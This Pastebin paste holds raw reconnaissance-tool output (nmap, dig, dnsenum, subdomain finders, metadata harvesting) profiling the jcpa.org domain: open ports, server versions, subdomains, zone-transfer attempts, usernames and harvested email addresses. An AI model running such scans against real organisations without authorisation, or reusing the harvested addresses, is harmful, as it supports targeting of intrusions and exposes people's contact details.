Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- =======================================================================================================================================
- Hostname jcpa.org ISP Unified Layer
- Continent North America Flag
- US
- Country United States Country Code US
- Region Utah Local time 06 Feb 2019 08:28 MST
- City Provo Postal Code 84606
- IP Address 198.57.177.19 Latitude 40.235
- =======================================================================================================================================
- #######################################################################################################################################
- > jcpa.org
- Server: 38.132.106.139
- Address: 38.132.106.139#53
- Non-authoritative answer:
- Name: jcpa.org
- Address: 198.57.177.19
- >
- #######################################################################################################################################
- HostIP:198.57.177.19
- HostName:jcpa.org
- Gathered Inet-whois information for 198.57.177.19
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 198.55.32.0 - 198.89.87.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: For registration information,
- remarks: you can consult the following sources:
- remarks:
- remarks: IANA
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- created: 2019-01-07T10:47:25Z
- last-modified: 2019-01-07T10:47:25Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.92.6 (WAGYU)
- Gathered Inic-whois information for jcpa.org
- ---------------------------------------------------------------------------------------------------------------------------------------
- Domain Name: JCPA.ORG
- Registry Domain ID: D517583-LROR
- Registrar WHOIS Server: whois.networksolutions.com
- Registrar URL: http://www.networksolutions.com
- Updated Date: 2018-01-14T21:19:13Z
- Creation Date: 1996-09-19T04:00:00Z
- Registry Expiry Date: 2019-09-18T04:00:00Z
- Registrar Registration Expiration Date:
- Registrar: Network Solutions, LLC
- Registrar IANA ID: 2
- Registrar Abuse Contact Email: abuse@web.com
- Registrar Abuse Contact Phone: +1.8003337680
- Reseller:
- Domain Status: ok https://icann.org/epp#ok
- Registrant Organization: Jerusalem Center for Public Affairs
- Registrant State/Province:
- Registrant Country: IL
- Name Server: NS3.P24.DYNECT.NET
- Name Server: NS1.P24.DYNECT.NET
- Name Server: NS2.P24.DYNECT.NET
- Name Server: NS4.P24.DYNECT.NET
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
- >>> Last update of WHOIS database: 2019-02-06T16:01:58Z <<<
- #######################################################################################################################################
- [i] Scanning Site: http://jcpa.org
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Jerusalem Center For Public Affairs
- [+] IP address: 198.57.177.19
- [+] Web Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- [+] CMS: WordPress
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Allow: /
- Disallow: /events/*
- Disallow: /tag/*
- Disallow: /wp-admin/
- Sitemap: http://jcpa.org/sitemap.xml
- -----------[end of contents]-------------
- W H O I S L O O K U P
- =======================================================================================================================================
- Domain Name: JCPA.ORG
- Registry Domain ID: D517583-LROR
- Registrar WHOIS Server: whois.networksolutions.com
- Registrar URL: http://www.networksolutions.com
- Updated Date: 2018-01-14T21:19:13Z
- Creation Date: 1996-09-19T04:00:00Z
- Registry Expiry Date: 2019-09-18T04:00:00Z
- Registrar Registration Expiration Date:
- Registrar: Network Solutions, LLC
- Registrar IANA ID: 2
- Registrar Abuse Contact Email: abuse@web.com
- Registrar Abuse Contact Phone: +1.8003337680
- Reseller:
- Domain Status: ok https://icann.org/epp#ok
- Registrant Organization: Jerusalem Center for Public Affairs
- Registrant State/Province:
- Registrant Country: IL
- Name Server: NS3.P24.DYNECT.NET
- Name Server: NS1.P24.DYNECT.NET
- Name Server: NS2.P24.DYNECT.NET
- Name Server: NS4.P24.DYNECT.NET
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
- >>> Last update of WHOIS database: 2019-02-06T16:02:26Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 198.57.177.19
- [i] Country: United States] Processing domain jcpa.org
- [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
- [+] Getting nameservers
- 208.78.70.24 - ns1.p24.dynect.net
- 208.78.71.24 - ns3.p24.dynect.net
- 204.13.250.24 - ns2.p24.dynect.net
- 204.13.251.24 - ns4.p24.dynect.net
- [-] Zone transfer failed
- [+] TXT records found
- "MS=ms16983907"
- "v=spf1 include:spf.protection.outlook.com -all"
- [+] MX records found, added to target list
- 0 jcpa-org.mail.protection.outlook.com.
- 10 jcpa-org.mail.protection.outlook.com.
- [*] Scanning jcpa.org for A records
- 198.57.177.19 - jcpa.org
- 52.96.37.40 - autodiscover.jcpa.org
- 40.97.30.168 - autodiscover.jcpa.org
- 40.97.188.232 - autodiscover.jcpa.org
- 40.97.24.8 - autodiscover.jcpa.org
- 63.208.156.169 - lists.jcpa.org
- 195.225.46.79 - mail.jcpa.org
- 104.211.16.22 - msoid.jcpa.org
- 104.211.48.16 - msoid.jcpa.org
- 40.114.120.17 - msoid.jcpa.org
- 104.211.48.20 - msoid.jcpa.org
- 104.211.16.17 - msoid.jcpa.org
- 104.211.48.18 - msoid.jcpa.org
- 195.225.46.79 - webmail.jcpa.org
- 198.57.177.19 - www.jcpa.org
- [i] State: Utah
- [i] City: Provo
- [i] Latitude: 40.2347
- [i] Longitude: -111.6447
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Wed, 06 Feb 2019 16:03:27 GMT
- [i] Server: Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- [i] Last-Modified: Tue, 05 Feb 2019 11:06:03 GMT
- [i] ETag: "1f3b5-58123985c19cc"
- [i] Accept-Ranges: bytes
- [i] Content-Length: 127925
- [i] Cache-Control: max-age=3, must-revalidate
- [i] Expires: Wed, 06 Feb 2019 16:03:30 GMT
- [i] Vary: Accept-Encoding,Cookie
- [i] Connection: close
- [i] Content-Type: text/html; charset=UTF-8
- D N S L O O K U P
- =======================================================================================================================================
- jcpa.org. 3599 IN SOA ns1.p24.dynect.net. darren\.jcpa.gmail.com. 702 3600 600 604800 60
- jcpa.org. 21599 IN NS ns4.p24.dynect.net.
- jcpa.org. 21599 IN NS ns3.p24.dynect.net.
- jcpa.org. 21599 IN NS ns2.p24.dynect.net.
- jcpa.org. 21599 IN NS ns1.p24.dynect.net.
- jcpa.org. 59 IN A 198.57.177.19
- jcpa.org. 14399 IN MX 0 jcpa-org.mail.protection.outlook.com.
- jcpa.org. 14399 IN MX 10 jcpa-org.mail.protection.outlook.com.
- jcpa.org. 3599 IN TXT "v=spf1 include:spf.protection.outlook.com -all"
- jcpa.org. 3599 IN TXT "MS=ms16983907"
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 198.57.177.19
- Network = 198.57.177.19 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 198.57.177.19 - 198.57.177.19 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2019-02-06 16:03 UTC
- Nmap scan report for jcpa.org (198.57.177.19)
- Host is up (0.11s latency).
- rDNS record for 198.57.177.19: 198-57-177-19.unifiedlayer.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
- S U B - D O M A I N F I N D E R
- =======================================================================================================================================
- [i] Total Subdomains Found : 2
- [+] Subdomain: mail.jcpa.org
- [-] IP: 195.225.46.79
- [+] Subdomain: www.jerusalem.jcpa.org
- [-] IP: 182.50.150.129
- #######################################################################################################################################
- [!] IP Address : 198.57.177.19
- [!] CMS Detected : WordPress
- [?] Would you like to use WPScan? [Y/n] n
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for jcpa.org
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/jcpa.org
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp closed telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns4.p24.dynect.net. (204.13.251.24) AS33517 Dynamic Network Services, Inc. United States
- ns3.p24.dynect.net. (208.78.71.24) AS33517 Dynamic Network Services, Inc. United States
- ns1.p24.dynect.net. (208.78.70.24) AS33517 Dynamic Network Services, Inc. United States
- ns2.p24.dynect.net. (204.13.250.24) AS33517 Dynamic Network Services, Inc. United States
- [+] MX Records
- 10 (104.47.10.36) AS8075 Microsoft Corporation United States
- [+] MX Records
- 0 (104.47.10.36) AS8075 Microsoft Corporation United States
- [+] Host Records (A)
- jcpa.orgHTTP: (198-57-177-19.unifiedlayer.com) (198.57.177.191) AS46606 Unified Layer United States
- mail.jcpa.org (media-line.co.il) (195.225.46.79) AS9116 012 Smile Communications LTD. Israel
- www.jerusalem.jcpa.orgFTP: (sg2nlhg734c1734.shr.prod.sin2.secureserver.net) (182.50.150.129) AS26496 GoDaddy.com, LLC Singapore
- [+] TXT Records
- "MS=ms16983907"
- "v=spf1 include:spf.protection.outlook.com -all"
- [+] DNS Map: https://dnsdumpster.com/static/map/jcpa.org.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 198.57.177.19:www.jcpa.org
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- 198.57.177.19 www.jcpa.org
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P1-1-Debian <<>> jcpa.org
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19156
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;jcpa.org. IN A
- ;; ANSWER SECTION:
- jcpa.org. 4 IN A 198.57.177.19
- ;; Query time: 92 msec
- ;; SERVER: 38.132.106.139#53(38.132.106.139)
- ;; WHEN: mer fév 06 11:13:53 EST 2019
- ;; MSG SIZE rcvd: 53
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P1-1-Debian <<>> +trace jcpa.org
- ;; global options: +cmd
- . 83174 IN NS j.root-servers.net.
- . 83174 IN NS g.root-servers.net.
- . 83174 IN NS l.root-servers.net.
- . 83174 IN NS k.root-servers.net.
- . 83174 IN NS b.root-servers.net.
- . 83174 IN NS c.root-servers.net.
- . 83174 IN NS h.root-servers.net.
- . 83174 IN NS e.root-servers.net.
- . 83174 IN NS f.root-servers.net.
- . 83174 IN NS d.root-servers.net.
- . 83174 IN NS i.root-servers.net.
- . 83174 IN NS m.root-servers.net.
- . 83174 IN NS a.root-servers.net.
- . 83174 IN RRSIG NS 8 0 518400 20190219050000 20190206040000 16749 . X4vIdVxyUDnjm19JlhKBZZgVu1+Py3dE4X7IN4/E3dQOHum45PDPyYKm DTXaXd5T7070rXA1mcghUCzemi0BdQlGxBlmFOKpAmX7dO3+WzkO52aS M7W8vM7AL6rAJehQbBFcBAHDC1Orps5lO8Gvvk7nKr+SfjgaAvgV14o/ 4vouiSXmmINGlT8L7K8fpwaERMJWYdyORTQeu/a2rk8mwxyyl0VbYMZo 41xBsIHVxv4S2En0jnuy4CR+f8Bck5GPp+EU/kM4PutLnHnbwtB4IQWA Dq3IE+D03FQnxkoMXDVFFHBBmgDyn5Ec/CXDcBaWEb3bDitTadWxadFD lPAM/Q==
- ;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 93 ms
- org. 172800 IN NS a0.org.afilias-nst.info.
- org. 172800 IN NS b0.org.afilias-nst.org.
- org. 172800 IN NS a2.org.afilias-nst.info.
- org. 172800 IN NS b2.org.afilias-nst.org.
- org. 172800 IN NS c0.org.afilias-nst.info.
- org. 172800 IN NS d0.org.afilias-nst.org.
- org. 86400 IN DS 9795 7 1 364DFAB3DAF254CAB477B5675B10766DDAA24982
- org. 86400 IN DS 9795 7 2 3922B31B6F3A4EA92B19EB7B52120F031FD8E05FF0B03BAFCF9F891B FE7FF8E5
- org. 86400 IN RRSIG DS 8 1 86400 20190219050000 20190206040000 16749 . YGua0+6nPggzpxRqL6+8UBxC96ekmt7JZgH2Mr3ViMoUV/5bNL+V2Vmz RNGRWgd6MXH0Y85DiTMReUkhEe+8yEKCYmx4GG5EFcqLvnjmdwCnwH8Z HVSc6N713ICg1CDfsRr5KPbhJfbYPm5OmEHGti3+EzVWaNExC4oIMRZm 9p456jEEIB86c15EAGLm8xij3sbgS9tlLkj08+zIS3joSA3mnGwDP/iT dlZGi5a+yYQ7jGWl2yJUwvsnPXPASNw+BHZgTfjsbiy0ysOsXikKgnCh JmdLqNLZWok6atVRi/e4LnLFswfTMkZRiyZdKejygBiitd/MauhD6BY9 qZnL7A==
- ;; Received 838 bytes from 192.112.36.4#53(g.root-servers.net) in 219 ms
- jcpa.org. 86400 IN NS ns1.p24.dynect.net.
- jcpa.org. 86400 IN NS ns2.p24.dynect.net.
- jcpa.org. 86400 IN NS ns3.p24.dynect.net.
- jcpa.org. 86400 IN NS ns4.p24.dynect.net.
- h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN NSEC3 1 1 1 D399EAAB H9PARR669T6U8O1GSG9E1LMITK4DEM0T NS SOA RRSIG DNSKEY NSEC3PARAM
- h9p7u7tr2u91d0v0ljs9l1gidnp90u3h.org. 86400 IN RRSIG NSEC3 7 2 86400 20190227161338 20190206151338 44603 org. VazL98D+/YK7AqfO2foAMJ5FMRw0z+OQAdzlDDI7hz1yDBxrgcaOQ2us +oXhxmD3MAJUqbHBvMrPVU5LMHUfSqRxmfL5bAcraD0cxLfmfgKUVGQq ekzvZk/u9tq6OY8+gL+z35oC46g52y2AiUFo26kIWVnuTDQn9GPJvCi1 5j4=
- 77gppho30fajnsgds1vpldg6mrmt20bq.org. 86400 IN NSEC3 1 1 1 D399EAAB 77H83474QG3J5T9ORK8SFMELGC4EANB6 NS DS RRSIG
- 77gppho30fajnsgds1vpldg6mrmt20bq.org. 86400 IN RRSIG NSEC3 7 2 86400 20190222153101 20190201143101 44603 org. dzjpTNDcMlANkOZ7iedyBNw5Mf26U0W1e/xxLFcPJ0QVmoltpZ3h5FHX Lcl39G/DvdHh/2uZ0Ow7f2AQ5qA61aB8iqSLZsjhC2UYHjYPzeDJXrNO oY2MlQG6Ql4cSjzwdtZ+O7TWd0qsrtpBwNdmI+SPyBimaLDxG4CFc5/4 du4=
- ;; Received 616 bytes from 199.249.120.1#53(b2.org.afilias-nst.org) in 61 ms
- jcpa.org. 60 IN A 198.57.177.19
- jcpa.org. 86400 IN NS ns4.p24.dynect.net.
- jcpa.org. 86400 IN NS ns3.p24.dynect.net.
- jcpa.org. 86400 IN NS ns1.p24.dynect.net.
- jcpa.org. 86400 IN NS ns2.p24.dynect.net.
- ;; Received 139 bytes from 2001:500:94:1::24#53(ns3.p24.dynect.net) in 33 ms
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: jcpa.org
- [-] DNSSEC is not configured for jcpa.org
- [*] SOA ns1.p24.dynect.net 208.78.70.24
- [*] NS ns1.p24.dynect.net 208.78.70.24
- [*] Bind Version for 208.78.70.24 9.10.5-P3.
- [*] NS ns1.p24.dynect.net 2001:500:90:1::24
- [*] Bind Version for 2001:500:90:1::24 9.10.5-P3.
- [*] NS ns3.p24.dynect.net 208.78.71.24
- [*] Bind Version for 208.78.71.24 9.10.5-P3.
- [*] NS ns3.p24.dynect.net 2001:500:94:1::24
- [*] Bind Version for 2001:500:94:1::24 9.10.5-P3.
- [*] NS ns2.p24.dynect.net 204.13.250.24
- [*] Bind Version for 204.13.250.24 9.10.5-P3.
- [*] NS ns4.p24.dynect.net 204.13.251.24
- [*] Bind Version for 204.13.251.24 9.10.5-P3.
- [*] MX jcpa-org.mail.protection.outlook.com 104.47.8.36
- [*] MX jcpa-org.mail.protection.outlook.com 104.47.9.36
- [*] MX jcpa-org.mail.protection.outlook.com 104.47.8.36
- [*] MX jcpa-org.mail.protection.outlook.com 104.47.9.36
- [*] A jcpa.org 198.57.177.19
- [*] TXT jcpa.org MS=ms16983907
- [*] TXT jcpa.org v=spf1 include:spf.protection.outlook.com -all
- [*] Enumerating SRV Records
- [-] No SRV Records Found for jcpa.org
- [+] 0 Records Found
- #######################################################################################################################################
- ] Processing domain jcpa.org
- [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
- [+] Getting nameservers
- 208.78.70.24 - ns1.p24.dynect.net
- 208.78.71.24 - ns3.p24.dynect.net
- 204.13.250.24 - ns2.p24.dynect.net
- 204.13.251.24 - ns4.p24.dynect.net
- [-] Zone transfer failed
- [+] TXT records found
- "MS=ms16983907"
- "v=spf1 include:spf.protection.outlook.com -all"
- [+] MX records found, added to target list
- 0 jcpa-org.mail.protection.outlook.com.
- 10 jcpa-org.mail.protection.outlook.com.
- [*] Scanning jcpa.org for A records
- 198.57.177.19 - jcpa.org
- 52.96.37.40 - autodiscover.jcpa.org
- 40.97.30.168 - autodiscover.jcpa.org
- 40.97.188.232 - autodiscover.jcpa.org
- 40.97.24.8 - autodiscover.jcpa.org
- 63.208.156.169 - lists.jcpa.org
- 195.225.46.79 - mail.jcpa.org
- 104.211.16.22 - msoid.jcpa.org
- 104.211.48.16 - msoid.jcpa.org
- 40.114.120.17 - msoid.jcpa.org
- 104.211.48.20 - msoid.jcpa.org
- 104.211.16.17 - msoid.jcpa.org
- 104.211.48.18 - msoid.jcpa.org
- 195.225.46.79 - webmail.jcpa.org
- 198.57.177.19 - www.jcpa.org
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 63.208.156.169 host lists.jcpa.org
- 195.225.46.79 host mail.jcpa.org
- 195.225.46.79 alias webmail.jcpa.org
- 195.225.46.79 host mail.jcpa.org
- 198.57.177.19 301 alias www.jcpa.org Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- 198.57.177.19 301 host jcpa.org Apache/2.4.38 (cPanel) OpenSSL/1.0.2q mod_bwlimited/1.4
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- jcpa.org -----
- Host's addresses:
- __________________
- jcpa.org. 17 IN A 198.57.177.19
- Name Servers:
- ______________
- ns2.p24.dynect.net. 70679 IN A 204.13.250.24
- ns3.p24.dynect.net. 69781 IN A 208.78.71.24
- ns4.p24.dynect.net. 70361 IN A 204.13.251.24
- ns1.p24.dynect.net. 69454 IN A 208.78.70.24
- Mail (MX) Servers:
- ___________________
- jcpa-org.mail.protection.outlook.com. 10 IN A 104.47.8.36
- jcpa-org.mail.protection.outlook.com. 10 IN A 104.47.10.36
- jcpa-org.mail.protection.outlook.com. 10 IN A 104.47.8.36
- jcpa-org.mail.protection.outlook.com. 10 IN A 104.47.10.36
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for jcpa.org on ns2.p24.dynect.net ...
- Trying Zone Transfer for jcpa.org on ns3.p24.dynect.net ...
- Trying Zone Transfer for jcpa.org on ns4.p24.dynect.net ...
- Trying Zone Transfer for jcpa.org on ns1.p24.dynect.net ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Domain Name: JCPA.ORG
- Registry Domain ID: D517583-LROR
- Registrar WHOIS Server: whois.networksolutions.com
- Registrar URL: http://www.networksolutions.com
- Updated Date: 2018-01-14T21:19:13Z
- Creation Date: 1996-09-19T04:00:00Z
- Registry Expiry Date: 2019-09-18T04:00:00Z
- Registrar Registration Expiration Date:
- Registrar: Network Solutions, LLC
- Registrar IANA ID: 2
- Registrar Abuse Contact Email: abuse@web.com
- Registrar Abuse Contact Phone: +1.8003337680
- Reseller:
- Domain Status: ok https://icann.org/epp#ok
- Registrant Organization: Jerusalem Center for Public Affairs
- Registrant State/Province:
- Registrant Country: IL
- Name Server: NS3.P24.DYNECT.NET
- Name Server: NS1.P24.DYNECT.NET
- Name Server: NS2.P24.DYNECT.NET
- Name Server: NS4.P24.DYNECT.NET
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
- >>> Last update of WHOIS database: 2019-02-06T16:02:42Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
- The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- [1/25] /webhp?hl=en-CA
- [x] Error downloading /webhp?hl=en-CA
- [2/25] http://jcpa.org/resolution242/
- [3/25] http://www.jcpa.org/RedLinesInv_web.pdf
- [4/25] http://www.jcpa.org/RedLinesInv_webHEB.pdf
- [5/25] http://jcpa.org/pdf/intl_presence_hebron_weiner.pdf
- [6/25] http://jcpa.org/text/Israel60_Gavison.pdf
- [7/25] http://jcpa.org/pdf/PA_budget_2016.pdf
- [8/25] http://jcpa.org/pdf/migration_weiner.pdf
- [9/25] http://jcpa.org/pdf/SJP_unmasked_2018_web.pdf
- [10/25] http://www.jcpa.org/text/Challenge_to_Israel_Legitimacy.pdf
- [11/25] http://jcpa.org/pdf/terror_book_amzn_cvr_23may2017.pdf
- [12/25] http://www.jcpa.org/text/Hamas_Gaza_War_Accountability_Under_International_Law.pdf
- [13/25] http://jcpa.org/text/Israel60_Blum.pdf
- [14/25] http://jcpa.org/pdf/JIB_vol16_no20_18dec16.pdf
- [15/25] http://jcpa.org/text/louis_marshall.pdf
- [16/25] http://jcpa.org/pdf/gaza_war_weiner.pdf
- [17/25] http://www.jcpa.org/text/americanjewry.pdf
- [18/25] http://jcpa.org/pdf/Inspections_The_Weak_Link_in_a_Nuclear_Agreement_with_Iran.pdf
- [19/25] http://jcpa.org/pdf/jerusalem_center_annual_report_2017.pdf
- [20/25] http://www.jcpa.org/text/Palestinian_State_ICC.pdf
- [21/25] http://jcpa.org/pdf/palestinian_christians_weiner.pdf
- [22/25] http://jcpa.org/pdf/Jerusalem_Viewpoints_no609_feb2017.pdf
- [23/25] http://jcpa.org/pdf/DB_web.pdf
- [24/25] http://www.jcpa.org/text/International_Law_and_Military_Operations_in_Practice.pdf
- [25/25] http://jcpa.org/text/Israel60_Steinberg.pdf
- [+] List of users found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- Jerusalem Center
- David
- Darren
- [+] List of software found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- Adobe PDF Library 8.0
- Adobe InDesign CS3 (5.0)
- Adobe Acrobat 9.0 Image Conversion Plug-in
- Adobe Acrobat 9.0
- WorkCentre Pro 128
- ��Microsoft� Word 2010
- Adobe PDF Library 10.0.1
- Adobe InDesign CS6 (Windows)
- Adobe PDF Library 9.9
- Adobe InDesign CS5 (7.0)
- Adobe PDF Library 9.0
- Adobe InDesign CS4 (6.0.5)
- Adobe InDesign CS3 (5.0.4)
- Google
- Adobe PDF Library 7.0
- Adobe InDesign CS2 (4.0.5)
- 3-Heights(TM) PDF Producer 4.4.14.0 (http://www.pdf-tools.com)
- [+] List of paths and servers found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] List of e-mails found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- jcpa@netvision.net.il
- article.php@id
- jcpa@netvision.net.il
- jcpa@netvision.net.il
- jcpa@ne
- stefaan.peirsman@fos-socsol.be
- jcpa@netvision.net.il.
- jcpa@netvision.net.il
- laurend@mayyimhayyim.org.
- info@jcpa.org
- jcpa@netvision.net.il
- cjcs3@verizon.net
- jcpa@netvision.net.il
- jcpa@netvision.net.il.
- jcpa@netvision.net.il
- #######################################################################################################################################
- ____ _ _ _ _ _____
- / ___| _ _| |__ | (_)___| |_|___ / _ __
- \___ \| | | | '_ \| | / __| __| |_ \| '__|
- ___) | |_| | |_) | | \__ \ |_ ___) | |
- |____/ \__,_|_.__/|_|_|___/\__|____/|_|
- # Coded By Ahmed Aboul-Ela - @aboul3la
- [-] Enumerating subdomains now for jcpa.org
- [-] verbosity is enabled, will show the subdomains results in realtime
- [-] Searching now in Baidu..
- [-] Searching now in Yahoo..
- [-] Searching now in Google..
- [-] Searching now in Bing..
- [-] Searching now in Ask..
- [-] Searching now in Netcraft..
- [-] Searching now in DNSdumpster..
- [-] Searching now in Virustotal..
- [-] Searching now in ThreatCrowd..
- [-] Searching now in SSL Certificates..
- [-] Searching now in PassiveDNS..
- ThreatCrowd: jerusalem.jcpa.org
- Virustotal: www.jcpa.org
- Virustotal: www.jerusalem.jcpa.org
- Virustotal: www.dailyalert.jcpa.org
- SSL Certificates: www.jcpa.org
- DNSdumpster: mail.jcpa.org
- DNSdumpster: www.jerusalem.jcpa.org
- Bing: jerusalem.jcpa.org
- PassiveDNS: mail.jcpa.org
- Yahoo: www.jcpa.org
- Baidu: www.jerusalem.jcpa.org
- Baidu: jerusalem.jcpa.org
- [-] Saving results to file: /usr/share/sniper/loot//domains/domains-jcpa.org.txt
- [-] Total Unique Subdomains Found: 5
- www.jcpa.org
- www.dailyalert.jcpa.org
- jerusalem.jcpa.org
- www.jerusalem.jcpa.org
- mail.jcpa.org
- #######################################################################################################################################
- jcpa.org,198.57.177.19
- www.jcpa.org,198.57.177.19
- jerusalem.jcpa.org,182.50.150.129
- lists.jcpa.org,63.208.156.169
- webmail.jcpa.org,195.225.46.79
- mail.jcpa.org,195.225.46.79
- www.jerusalem.jcpa.org,182.50.150.129
- dailyalert.jcpa.org,195.225.46.18
- www.dailyalert.jcpa.org,195.225.46.18
- jcpa.jcpa.org,195.225.46.79
- #######################################################################################################################################
- ===============================================
- -=Subfinder v1.1.3 github.com/subfinder/subfinder
- ===============================================
- Running Source: Ask
- Running Source: Archive.is
- Running Source: Baidu
- Running Source: Bing
- Running Source: CertDB
- Running Source: CertificateTransparency
- Running Source: Certspotter
- Running Source: Commoncrawl
- Running Source: Crt.sh
- Running Source: Dnsdb
- Running Source: DNSDumpster
- Running Source: DNSTable
- Running Source: Dogpile
- Running Source: Exalead
- Running Source: Findsubdomains
- Running Source: Googleter
- Running Source: Hackertarget
- Running Source: Ipv4Info
- Running Source: PTRArchive
- Running Source: Sitedossier
- Running Source: Threatcrowd
- Running Source: ThreatMiner
- Running Source: WaybackArchive
- Running Source: Yahoo
- Running enumeration on jcpa.org
- dnsdb: Unexpected return status 503
- waybackarchive: Get http://web.archive.org/cdx/search/cdx?url=*.jcpa.org/*&output=json&fl=original&collapse=urlkey&page=
- : net/http: HTTP/1.x transport connection broken: malformed HTTP response "<html>"
- Starting Bruteforcing of jcpa.org with 9985 words
- Total 20 Unique subdomains found for jcpa.org
- .jcpa.org
- .www.jcpa.org
- autodiscover.jcpa.org
- dailyalert.jcpa.org
- events.jcpa.org
- info.jcpa.org
- jcp.jcpa.org
- jerusalem.jcpa.org
- lists.jcpa.org
- mail.dailyalert.jcpa.org
